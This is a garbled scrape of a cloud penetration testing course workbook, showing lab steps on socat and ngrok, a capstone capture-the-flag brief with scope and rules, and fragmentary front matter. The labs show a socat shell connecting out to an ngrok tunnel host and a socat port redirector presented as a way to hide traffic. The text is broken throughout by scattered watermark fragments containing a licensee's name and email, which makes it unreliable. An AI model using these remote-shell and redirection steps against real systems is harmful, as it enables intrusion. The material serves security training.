The prompt moves from /tmp to ~ .
ly
Ju
Run some additional commands such as:
>
om
_c
tty
ok
id
23169600 @
ou
tlo
hostname
66
s1
ne
pwd
ljo
Gregg Harris
au
Notice that with the tty command you have a real shell! With error handling!
<p
s
rri
Ha
gg
re
:G
To
d
n se
ce
$ exit
Li
Using ngrok and Socat

live
Hit UP or type the command in again to start listening on port 9998 Let's now add ngrok .
Open up a new shell:

$ ngrok tcp 9998
Copy the ngrok URL
3e1e3b497543e6c11ac8e4188959c93e
Now in the socat exec command let's change the connect address:
tcp:0.tcp.ngrok.io:<randomport>
20
,20
The will be replaced with whatever value ngrok assigns to you.
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
Sometimes socat will NOT resolve the 0.tcp.ngrok.io name, if this happens:
ne
ljo
$ dig 0.tcp.ngrok.io
Gregg Harris
au
:<randomport>
gg
This should now connect.

re
: G
How can we uplevel this a bit more? What if we want to a PHP redirector like the one that we described with PHP
To
Hop? Let's next attempt this to try and further obfuscate things.
d
nse
This will exit our socat.

ce
Li
$ exit
live
You will also want to 'exit' the ngrok commands.
Portforwards

Sometimes we may want to build a port forward to go from system to system. This become fairly trivial with
socat. Let's begin by starting a webserver on port 9998.
3e1e3b497543e6c11ac8e4188959c93e
$ cd /opt/php-webshell/code
20
Let's now curl this directory:
, 20
28
$ curl http://<yourLinuxIp>:9999
ly
Ju
It should return some html with directories in it like below:
>
om
_c
ok
23169600 ou
@
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
G
How would be able to redirect this? Imagine if we wanted to:

:
To
d
se
Open a port on SystemA Redirect all those packets to SystemB.

n
ce
We could use netcat by using a netcat backpipe, or we could use socat:

Li
live
$ socat TCP-LISTEN:9998,fork TCP:<yourLinuxIp>:9999
Let's try this command, open a new MATE Terminal and type in this command replacing With your linux ip!
$ curl http://<yourLinuxIp:9998

Notice that we are going to port 9998, which will redirect to your webserver on 9999! This is an example of using
a socat port redirection. It is simple, lightweight and the fork command means it will be multithreaded and multi-
user.
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
Remember to exit all of SOCAT!

re
G
Conclusions
:
To
We have over the years seen the re-implementation of simple dumb socket servers like netcat. Over the years
d
se
the tool has proved as useful as almost any penetration testing tool. What is not commonly seen used however,
n
and is albeit more powerful is socat. This tool allows you to manipulate tra c in many more ways than netcat,
ce
and at times in a more simple manner without having worry about building pipe les or fo les. It can also
Li
live
provide full working shells and shells over avenues we may have no considered before like a namedpipe.
This lab shows us two features that is valuable in a Red Team Exercise:

1. The ability to get shells or use OS tools to move items around
2. Using a socket router as a way to move tra c around in a simple, easy and e cient manner. Socat a ords
us another avenue.
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
n se
ce
Li
live

Lab 6: Our Capstone / CTF
3e1e3b497543e6c11ac8e4188959c93e
Challenge
20
Brief Intro
, 20
28
Today there is no instructions, hence there is no real PowerPoint Lab Presentation.
ly
Ju
The ow for today
>
om
_c
We have our capstone even today. You will be working in groups of three to ve. No less than three no more
ok
than ve people. Today's Capture the Flag event is designed to model a real world penetration testing. Notably
23169600 tlo
missing from this day is a Score Board, so let's go over some rules.
@
ou
Teams of no more than three to ve individuals
66
s1
Overall Project.
ne
ljo
Jetrist.com is a a startup that works with in uencers in designing 'faux' extravegant adventures to help them
Gregg Harris
au
boost their social media precense. Jetrist.com would like you the individual teams of testers to nd vulnerabilities
<p
in the system that may expose sensitive client data. What data? Any data that links clients to their service as this
s
could a ect both the Jetrist company and the Social Media in uences by exposing the truth. What truth?
rri
Jetrist.com makes it appear as those in uencers live the most lavish lifestyle possible, of course.
Ha
gg
Your job is to try and nd all the vulnerabilities in the environment that could lead to full compromise.
re
G
The ags and the path to victory

:
To
d
There are two steps to win the day!

n se
ce
First the ' ags' in the environment are hints that will be shown to you on exploitation of a service. These ' ags'
Li
will provide you both guidance to look further as well as serve as the sign posts of successfully completing a
challenge. live
Secondly, you will need to alot from 45 minutes to an hour to construct a report. The report can be created using
Libre Impress or any Powerpower/Google Slide that you have, the instructor will choose the top three reports
and make a determination of which team has created the best presentation.

Those who have a combination of rst to get all the ags and have one of the top scoring reports will win.
Flags will all be called flag . Flags will provide one of two things:
3e1e3b497543e6c11ac8e4188959c93e
1. HINTS
2. KEYS or KEY MATERIAL
20
How do I nd ags?
, 20
28
The ags can be either:
ly
Ju
1. Files called flag
>
2. Files called flag.extension , i.e flag.exe , flag.html , etc.
om
3. Database records called flag
_c
4. Database keys called flag
ok
5. Other items that you can search with the word flag .
Flags on disk will be found either:

23169600 @
ou
tlo
66
1. The web server root i.e. /var/www/html/ or C:\wwwroot

s1
2. At the root of the servers for linux or for windows.

ne
/ C:\
ljo
Gregg Harris
au
Building a solid report

<p
1. Summarize the more relevant impacts of your penetration test

s
rri
2. Summarize how you found the vulnerabilities

Ha
3. List the vulnerbilities (very minimally) from more impactful to least

4. Explain which ones, or ones would prevent full exploitation, so that we can x this quickly.
gg
re
G
Hints
:
To
Build this report AS you hack. Don't wait till the end. Make sure to be creative
d
n se
ce
We will end this competition at 1:00 and presentations will work from 1:30 to 2:30.
Li
Scope
live
1. The only domain, and associated subdomains that are in scope for today is: jetrist.com and any of its
associated subdomains . blessed-duck.jetrist.com is the only VALID subdomain to use.

2. Services may be hosted in AWS, Azure, or even O ce 365 but no other Cloud Environments are in scope.
3. The Web Applications, The VPC Environments, the Databases, and Virutal Machines are all in scope.
3e1e3b497543e6c11ac8e4188959c93e
4. The services in a shared remote database environment can be tested, but you cannot extract data that does
not belong to jetrist.com
20
5. Container registries that are private are in scope, as is any source code repositories.
, 20
28
Rules of Engagement:
ly
Ju
1. Web Applications and Network Compute Environments for this domain are in scope
2. You must not bring down production systems, but you can install software
>
om
3. You can read keys but not change them
4. Do not add root keys
_c
5. Do not delete any ags
ok
6. Password Brute Forcing is in scope IF you construct a wordlist and a very structure attempt, do not attempt
50,000 passwords on an account.
7. No Denial of Service Attacks
23169600 @
ou
tlo
8. No Performance Hogging Attacks.
66
s1
Bug Bounty
ne
ljo
Gregg Harris
au
If you nd a vulnerability in the Class you may submit for a Bug Bounty but this should no be the focus for the
<p
day. If you nd an actual vulnerabiliy in a cloud provider that you feel shoud be reported you should attempt to
s
do this.
rri
Ha
Any Questions?
gg
re
You may begin!
: G
To
d
n se
ce
Li
live

SEC588 Workbook

Uploaded by

Copyright:

Available Formats

You might also like

SEC588 Workbook

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

SEC588 Workbook

Uploaded by

Copyright:

Available Formats

© SANS Institute 2020 SEC588 | CLOUD PENETRATION TESTING

Licensed To: Gregg Harris <pauljones166@outlook_com> July 28, 2020

consent of SANS Institute.

addendum to this CLA may accompany this Courseware.

registered trademarks of Apple Inc.

PMP and PMBOK are registered marks of PMI.

SIFT® is a registered trademark of Harbingers, LLC. Used with permission.

Accessing the Digital Edition of the Lab Wiki

Installing your Virtual Machine

instruction to have the Virtual Machine Installed.

The Installation Steps in a reduced manner are as follows:

From VMWare Fusion, Workstation, or Player, choose File | Open

© 2020 Moses Frost 1

The Virtual Machine should be connected to the Lab Environment.

The following typographical conventions are used throughout the labs:

Indicates new terms and items of emphasis.

function names, statements, keywords, etc.

2 © 2020 Moses Frost

Moses Frost – moses@moses.io (mailto:moses@moses.io)

© 2020 Moses Frost 3

unsupported hypervisor so we will be asking you to use a supported hypervisor.

VMWare Workstation Evaluation for Windows and Linux Systems (http://bit.ly/SEC588-Lab1-1-VMware)

4 © 2020 Moses Frost

VMware Dialog Prompt

Log In to the Slingshot Linux VM

until you need it for a lab exercise.

© 2020 Moses Frost 5

Docker's CLI toolkit

our console is essential.

Getting your class

6 © 2020 Moses Frost

If your IP address is 23.85.17.191 .

be completed within that timeframe.

Requirements for This Lab

will be used in the class.

© 2020 Moses Frost 7

8 © 2020 Moses Frost

© 2020 Moses Frost 9

10 © 2020 Moses Frost

Setting up the environment with nGrok

© 2020 Moses Frost 11

From here sign up for an account:

12 © 2020 Moses Frost

© 2020 Moses Frost 13

From here you will need to type the following:

ngrok authtoken <string from the above step>

ngrok http 9999

14 © 2020 Moses Frost

Now go back to the Firefox Browser and go to:

What you should see on the screen is something like so:

© 2020 Moses Frost 15

16 © 2020 Moses Frost

This lab also will require that you go to sec588.net

© 2020 Moses Frost 17

Open a MATE shell and let's re-run dnsrecon.py.

18 © 2020 Moses Frost

We can also see how long this wordlist:

Running DNS Recon